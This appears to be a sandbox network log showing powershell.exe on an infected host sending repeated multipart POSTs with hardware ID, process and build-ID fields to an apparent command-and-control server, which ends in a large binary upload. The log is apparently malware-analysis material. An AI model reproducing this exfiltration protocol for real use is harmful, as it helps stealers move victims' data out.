2024-12-21 20:06:33 UTC	1134	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 20:06:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n34l84iifaehftv5k6o7m0qu27; expires=Wed, 16 Apr 2025 13:53:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UBvtcWU%2BYEcUAlrnE0GVd0MwVG%2B5UPSVGM4DkPUphbdap4q%2BaQ72%2BV1fvXhSOcJ0udCoHubCRR7GeNl6HPO0fIv8EjH701c1QAXAebWeLdjDXm9bav7u1NosbUjYiYqtf4dJ3Ho%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5a7e46ce95dab5-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=128932&min_rtt=128849&rtt_var=27312&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1606&delivery_rate=29657&cwnd=251&unsent_bytes=0&cid=6daf56c5dd8f25a6&ts=740&x=0"
2024-12-21 20:06:33 UTC	24	IN	Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0d 0a Data Ascii: 12ok 102.129.152.205
2024-12-21 20:06:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.11.20	49771	104.21.96.1	443	9160	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 20:06:33 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=02CXJCFFBYN2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20809 Host: surmisehotte.click
2024-12-21 20:06:33 UTC	15331	OUT	Data Raw: 2d 2d 30 32 43 58 4a 43 46 46 42 59 4e 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 36 37 38 31 36 33 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 30 32 43 58 4a 43 46 46 42 59 4e 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 32 43 58 4a 43 46 46 42 59 4e 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 0d 0a 2d 2d 30 32 43 58 4a 43 46 46 42 59 4e 32 0d Data Ascii: --02CXJCFFBYN2Content-Disposition: form-data; name="hwid"71678163B129FD4CDB71E32F12885CB3--02CXJCFFBYN2Content-Disposition: form-data; name="pid"2--02CXJCFFBYN2Content-Disposition: form-data; name="lid"yJEcaG--singl6--02CXJCFFBYN2
2024-12-21 20:06:33 UTC	5478	OUT	Data Raw: 52 ef 2b b0 50 93 52 cd 21 5a 45 37 59 84 2a ab e7 59 db e6 ed c4 56 d7 d8 75 7b 47 d2 68 31 1f f5 ce c4 26 80 58 00 9f 02 e2 d7 5d ef da 68 c4 65 f3 02 1a 5d e3 17 54 a9 ba eb 91 5a 95 6d a3 b1 48 ab ef e3 44 b6 cc 50 39 d2 80 18 d8 28 05 de d2 29 a7 23 a3 fd 62 e0 d2 60 f3 9c de 50 85 b6 cd a9 74 4c d8 cc 07 59 7e 6f 0c f9 6f 38 01 50 1f e0 d4 37 c7 23 5d 66 24 ce ee e1 f7 f9 c0 8d 8f a2 96 74 b9 a0 9b bc 33 c5 0f 18 ae 1a d3 37 38 e4 b5 bb 46 d8 95 3d 17 6f 0d a8 d5 98 dd 3e c6 65 f9 ed 6c 0e 6b 59 60 ab 33 1a 26 4e 75 6d ba d1 05 38 57 6f f9 d9 68 fa 51 96 5e b3 35 47 37 a9 e3 b0 8e 66 f6 1c 65 f9 69 8c b3 d9 1e 97 75 47 2b b9 79 5a f4 06 d5 35 56 b0 1a 03 eb 65 b2 76 8e 96 58 2b 9d d3 0a e3 aa 65 b3 6e 84 d7 68 9f d0 72 c9 78 92 f5 e5 d9 68 37 aa 14 Data Ascii: R+PR!ZE7Y*YVu{Gh1&X]he]TZmHDP9()#b`PtLY~oo8P7#]f$t378F=o>elkY`3&Num8WohQ^5G7feiuG+yZ5VevX+enhrxh7
2024-12-21 20:06:34 UTC	1131	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 20:06:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nf1lepkppriof5ig5mfo06f18p; expires=Wed, 16 Apr 2025 13:53:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tNlWTkjFqm5itjJHXAuh%2BbbXWGgmsZmVTXkisChoVnDhNbgfLXqIIAVAEWwUMoy1h03eyFRsP19lnPUKNEmgsm9L7RRXsWx22vd8nu346EkumKDsHNDZIfjPCA0z3ESDxu8DKRc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5a7e4cdc55da9f-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=128978&min_rtt=128841&rtt_var=27391&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21767&delivery_rate=29627&cwnd=252&unsent_bytes=0&cid=6f7b6419800858c9&ts=650&x=0"
2024-12-21 20:06:34 UTC	24	IN	Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0d 0a Data Ascii: 12ok 102.129.152.205
2024-12-21 20:06:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.11.20	49772	104.21.96.1	443	9160	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 20:06:34 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ORJ90MB0UF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 10891 Host: surmisehotte.click
2024-12-21 20:06:34 UTC	10891	OUT	Data Raw: 2d 2d 4f 52 4a 39 30 4d 42 30 55 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 36 37 38 31 36 33 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 4f 52 4a 39 30 4d 42 30 55 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 52 4a 39 30 4d 42 30 55 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 0d 0a 2d 2d 4f 52 4a 39 30 4d 42 30 55 46 0d 0a 43 6f 6e 74 65 6e 74 Data Ascii: --ORJ90MB0UFContent-Disposition: form-data; name="hwid"71678163B129FD4CDB71E32F12885CB3--ORJ90MB0UFContent-Disposition: form-data; name="pid"2--ORJ90MB0UFContent-Disposition: form-data; name="lid"yJEcaG--singl6--ORJ90MB0UFContent
2024-12-21 20:06:35 UTC	1135	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 20:06:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6a316oisn2711o6th7ok62nhf0; expires=Wed, 16 Apr 2025 13:53:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=giIudcwv0qTcQP%2BtKq1vIrDt20glDLEUhsc9qSf8oWHZsWOiayXG7wxdvIiOhm%2BSlVewVsw2IF2RUNi2Q6rARUUsztUeRcPhN6NWOf%2FHlEMRytq20HCKWVNR2H3vgFA2YJQIfxE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5a7e52ab9221fd-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=129520&min_rtt=129368&rtt_var=27531&sent=10&recv=16&lost=0&retrans=0&sent_bytes=2844&recv_bytes=11825&delivery_rate=29478&cwnd=252&unsent_bytes=0&cid=b49d464463f0cd1e&ts=980&x=0"
2024-12-21 20:06:35 UTC	24	IN	Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0d 0a Data Ascii: 12ok 102.129.152.205
2024-12-21 20:06:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.11.20	49773	104.21.96.1	443	9160	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 20:06:35 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=8FET93FDC1R7OEWWV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20562 Host: surmisehotte.click
2024-12-21 20:06:35 UTC	15331	OUT	Data Raw: 2d 2d 38 46 45 54 39 33 46 44 43 31 52 37 4f 45 57 57 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 36 37 38 31 36 33 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 38 46 45 54 39 33 46 44 43 31 52 37 4f 45 57 57 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 38 46 45 54 39 33 46 44 43 31 52 37 4f 45 57 57 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 0d 0a Data Ascii: --8FET93FDC1R7OEWWVContent-Disposition: form-data; name="hwid"71678163B129FD4CDB71E32F12885CB3--8FET93FDC1R7OEWWVContent-Disposition: form-data; name="pid"3--8FET93FDC1R7OEWWVContent-Disposition: form-data; name="lid"yJEcaG--singl6
2024-12-21 20:06:35 UTC	5231	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 4d d1 61 7a dd 77 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 5c 6f 74 98 5e f7 dd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a b7 29 3a 4c af fb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d eb 8d 0e d3 eb be 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 36 45 87 e9 75 df 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 bd d1 61 7a dd 77 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Mazw\ot^:):Ln`X6Eusazw
2024-12-21 20:06:36 UTC	1142	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 20:06:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=uq1rpp1u4vc6jpc2m5res3h869; expires=Wed, 16 Apr 2025 13:53:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ftXdXz1JLT4MOCg%2FtcqWZUHE40hn8U%2FyMMUOQt16HIzokt4oDs3Yqub3GZlRBtUR%2FJ0R8y%2BTuFGJjYfbbQnbQssLIaqi8q%2FWJ26hSYjYeeygtKFWVHgFNe7vZP0XoM5%2BSCkKdFc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5a7e5ae8984c13-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=128863&min_rtt=128780&rtt_var=27299&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21525&delivery_rate=29677&cwnd=252&unsent_bytes=0&cid=b5f1824c6f894dc5&ts=1006&x=0"
2024-12-21 20:06:36 UTC	24	IN	Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0d 0a Data Ascii: 12ok 102.129.152.205
2024-12-21 20:06:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.11.20	49774	104.21.96.1	443	9160	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 20:06:37 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ZABVSMIPP0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1230 Host: surmisehotte.click
2024-12-21 20:06:37 UTC	1230	OUT	Data Raw: 2d 2d 5a 41 42 56 53 4d 49 50 50 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 36 37 38 31 36 33 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 5a 41 42 56 53 4d 49 50 50 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 41 42 56 53 4d 49 50 50 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 0d 0a 2d 2d 5a 41 42 56 53 4d 49 50 50 30 0d 0a 43 6f 6e 74 65 6e 74 Data Ascii: --ZABVSMIPP0Content-Disposition: form-data; name="hwid"71678163B129FD4CDB71E32F12885CB3--ZABVSMIPP0Content-Disposition: form-data; name="pid"1--ZABVSMIPP0Content-Disposition: form-data; name="lid"yJEcaG--singl6--ZABVSMIPP0Content
2024-12-21 20:06:37 UTC	1128	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 20:06:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=uu08lb0ropco8tfsb995hbemfd; expires=Wed, 16 Apr 2025 13:53:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DiDDLcw864yhUHciv6gHf9hflE0qwKlHRdypqvJLuPzCdYthIuKOpemHG7kEmvW90I0FqDYDWocyfWCWC1oUzyeYYI0NUoqc%2BAa6kxX79r9ixfsuZJAsSXhk1pmPUdOu6AkTv6o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5a7e632a3cd9dd-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=129479&min_rtt=129372&rtt_var=27424&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2141&delivery_rate=29514&cwnd=252&unsent_bytes=0&cid=6892d4c91d74a7a7&ts=514&x=0"
2024-12-21 20:06:37 UTC	24	IN	Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0d 0a Data Ascii: 12ok 102.129.152.205
2024-12-21 20:06:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.11.20	49775	104.21.96.1	443	9160	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 20:06:38 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=9C1L2FFUKDYNR User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1043766 Host: surmisehotte.click
2024-12-21 20:06:38 UTC	15331	OUT	Data Raw: 2d 2d 39 43 31 4c 32 46 46 55 4b 44 59 4e 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 36 37 38 31 36 33 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 39 43 31 4c 32 46 46 55 4b 44 59 4e 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 43 31 4c 32 46 46 55 4b 44 59 4e 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 0d 0a 2d 2d 39 43 31 4c 32 46 46 55 4b 44 Data Ascii: --9C1L2FFUKDYNRContent-Disposition: form-data; name="hwid"71678163B129FD4CDB71E32F12885CB3--9C1L2FFUKDYNRContent-Disposition: form-data; name="pid"1--9C1L2FFUKDYNRContent-Disposition: form-data; name="lid"yJEcaG--singl6--9C1L2FFUKD
2024-12-21 20:06:38 UTC	15331	OUT	Data Raw: bc c3 97 0f 46 19 01 d1 00 9c b1 8a da cc f0 50 29 d1 d9 ef d7 2d 25 4f ec fc 56 cf 18 c1 d9 88 7f 75 03 33 17 0b 13 2a bc b7 b6 69 25 76 ec ad cb 60 0a 3a 40 70 37 30 91 92 71 4c 70 52 80 82 76 72 9c 5c db 17 21 1a 00 a4 a5 3b 42 40 c2 9b d8 d9 3c 28 91 bd 17 08 a6 a8 56 82 56 d9 c7 80 5d 1e 1e 88 3b 28 96 02 f6 2f 82 29 09 7f b6 af 16 59 2f 03 ab 4a fc 98 f5 c8 aa 05 68 f5 c4 79 a6 66 53 df 2a e7 39 29 f1 9c 89 ed 6f 3f 6b 01 21 a6 d6 14 76 38 61 73 a1 6c cb 20 2d 89 c4 ef 0a 47 0b fe c7 96 44 8b 83 ff 7b 1f c5 79 1b fe ad 28 30 a5 d5 03 ba 91 22 0f 34 9e 61 c6 40 98 b5 b7 f9 13 d5 68 2b bb 90 cd 63 57 c4 b2 27 d6 04 f9 0a b2 4c 5d 2e 4a cf fd 45 bc f3 35 0e e4 27 a6 90 df f6 b4 3d 3b 70 0c ac 20 17 d4 8e 39 06 a4 3f 8a 12 29 0e 99 62 d3 5a 04 93 33 93 Data Ascii: FP)-%OVu3i%v`:@p70qLpRvr\!;B@<(VV];(/)Y/JhyfS9)o?k!v8asl -GD{y(0"4a@h+cW'L].JE5'=;p 9?)bZ3
2024-12-21 20:06:38 UTC	15331	OUT	Data Raw: 1a 9e 10 b9 57 73 f7 e7 05 6c 12 01 15 eb b2 17 7a cd a2 9e ad 0d 54 6c 07 9b fd 95 96 28 03 af b4 62 3d 83 ef db 9a 20 06 9d f4 39 cf 8b c5 18 f3 b3 9b 16 d5 fd 17 04 59 2d f5 4d 0f 23 45 8d 2b 66 c6 b5 35 df a7 ed 25 24 b7 7d 11 4c 76 eb e9 1f 53 a0 ee 7c 13 a3 a6 c5 53 8f 68 a9 e9 cc 64 c3 6a 3b 5d 19 3d 0a 73 11 87 11 c1 f7 40 28 76 3a 93 c6 66 e6 7d de f4 48 f4 51 6a 21 b8 53 ca 2e 1b d9 9e 51 5c 48 0d 37 06 7b f9 54 0d 1a 53 a3 9f b9 53 1a fa 91 5d 1f cd 71 a1 4d a7 21 ce cc 8a 2b 03 9d ae 40 99 8d 8b 46 68 04 d4 c0 48 67 7c 2b a0 a3 cc ef cc ad bf 97 ba ce 40 1e 3c 88 a1 e2 59 ed 1b aa 54 27 a5 dc ee 35 af 6d 73 7a f4 f9 bb 6f 4c ae c3 28 65 1f aa 07 5d b8 15 e9 de 40 d5 20 4d 30 d0 46 13 78 a6 a0 9e 19 29 8e 20 44 7e e3 cc b9 5c df d2 64 46 6a 7d Data Ascii: WslzTl(b= 9Y-M#E+f5%$}LvS\|Shdj;]=s@(v:f}HQj!S.Q\H7{TSS]qM!+@FhHg\|+@<YT'5mszoL(e]@ M0Fx) D~\dFj}
2024-12-21 20:06:38 UTC	15331	OUT	Data Raw: 04 77 1b 9d f3 f9 a6 84 90 f1 73 d9 d3 d9 6a ae 05 13 02 84 fa 47 54 5b 77 cd 1b 6c 69 25 04 c1 c0 85 f6 c7 bc 07 7a 4d 38 7e aa d8 cc e5 4d 4f de b5 d5 e3 4d 91 ba 7c 5d f0 a5 ed ef 81 43 56 1a ac 57 f3 68 5b bd 02 a7 57 95 ab c6 da cf 92 db c1 2e 4f 1b 85 1e 26 b7 08 a5 27 77 4e e6 97 a0 d8 bf db a3 cb f2 ab 63 6d c7 52 3a 33 d1 2f 4f c9 48 20 12 61 9f 49 8e d5 0f c4 9a 4e 42 8d 7a 64 3f b6 90 9b ed 46 4b a7 6a a9 fd 4f d6 46 ce ff ab 09 75 5e e8 b1 00 5c e5 7a 47 23 67 af 08 3b fe c0 6b 3c f4 05 55 8d 75 6c c0 fa ad 06 d0 0e 7d f5 14 99 a6 17 04 17 cd f9 6b 60 da 43 d4 80 7e 40 3e 7e 96 58 77 12 7f d5 3f 07 7f a6 a2 20 ab dd ea 0e 09 6b 52 18 1e 7c 55 74 14 b6 2b 63 18 3a 2c 1c 7d 03 46 f9 fb a4 0f 53 0f c3 82 89 40 02 ff 15 76 5e c8 7e d6 7f d6 7d ae Data Ascii: wsjGT[wli%zM8~MOM\|]CVWh[W.O&'wNcmR:3/OH aINBzd?FKjOFu^\zG#g;k<Uul}k`C~@>~Xw? kR\|Ut+c:,}FS@v^~}
2024-12-21 20:06:38 UTC	15331	OUT	Data Raw: fc 45 4d 77 19 e9 a8 7a 04 12 92 7a 75 e7 83 68 50 eb a8 13 c7 ba 4f ef a9 02 39 69 cb 00 ba 59 01 50 d2 15 a4 44 46 05 cd e6 b0 0e e8 42 4a 76 4c 0c a1 09 70 1f 3c 7e bf 90 f7 23 c3 9c 69 0d 7a 1c 7e 72 c7 00 ba 17 12 0d 2a 45 0c 64 15 0c 0f 82 3c d4 89 87 3a 42 b3 b7 52 f8 14 0e 51 46 12 2b b6 05 8e 55 51 97 5a c8 47 7e bc c5 96 05 96 62 46 17 a1 40 a0 d8 20 d8 4d a5 fa 62 b7 18 d8 9c ae 36 ae d7 b2 49 83 cf 1c fe 6e 23 eb b7 4d 8a e1 df de 6d f3 5e 96 e7 97 75 50 7b af a8 3a ec 11 e8 23 5b 61 4d 32 0e 5a b7 92 48 41 4c 24 16 d8 a2 82 9b c7 63 34 46 9c 99 7a 5d 0a 6b 75 a9 f4 9f c9 98 8b 8b 60 bc 31 d7 7e bf 88 b7 eb 8d ea 12 5f 13 9d 6c 42 8d b3 49 d1 5a c5 37 dd 5a 47 73 cf ac 21 c0 fd 46 e3 6d 95 c7 1b a9 c1 fe 07 16 47 bc 90 45 9f ed 3c b4 82 ec 4a Data Ascii: EMwzzuhPO9iYPDFBJvLp<~#iz~r*Ed<:BRQF+UQZG~bF@ Mb6In#Mm^uP{:#[aM2ZHAL$c4Fz]ku`1~_lBIZ7ZGs!FmGE<J
2024-12-21 20:06:38 UTC	15331	OUT	Data Raw: 38 8e f8 f9 81 e1 22 c9 6a 51 aa e6 b3 98 93 65 78 eb ed 40 48 a1 83 18 95 7a 74 fc 55 10 e3 e2 e7 43 9b 37 b3 b7 ca b3 bf 94 2d 1c 14 c8 7b 69 85 35 3e b1 f2 57 52 07 8b 40 29 2b aa 90 fb 65 77 2e 0b 25 95 76 90 5c d7 ed de 49 91 34 e8 bd ed 2f 21 af b7 2d e7 61 2a 10 aa 55 6a 69 a1 eb 46 63 92 6c f5 bd e2 e2 52 fa 57 fe 6a a3 13 46 f3 35 17 f7 ee a4 16 f7 f4 84 95 63 43 df 92 7f 1e 90 26 8c f2 a8 9b d2 43 94 d9 ef 81 45 eb 0d 21 71 48 6e 08 b4 e8 25 c5 10 1b 2e e0 fd a8 66 e3 62 fb 96 2a b6 63 f6 2f 0c fc f7 f8 75 11 c5 2b d0 76 4e 39 34 8f e5 c3 20 9b de 7d 41 19 2a da 52 ba a1 b3 77 f3 f7 48 69 c8 da 1f aa cf 8a e4 05 9d 53 bc a4 7a 07 d8 6c f8 df e5 56 bf 81 38 df 86 1a 2b 7c ff 3d 97 74 17 1a b0 e0 6f df 07 00 92 28 61 3f 0d 48 3b 7d 2c fa 88 4e 2e Data Ascii: 8"jQex@HztUC7-{i5>WR@)+ew.%v\I4/!-aUjiFclRWjF5cC&CE!qHn%.fbc/u+vN94 }A*RwHiSzlV8+\|=to(a?H;},N.
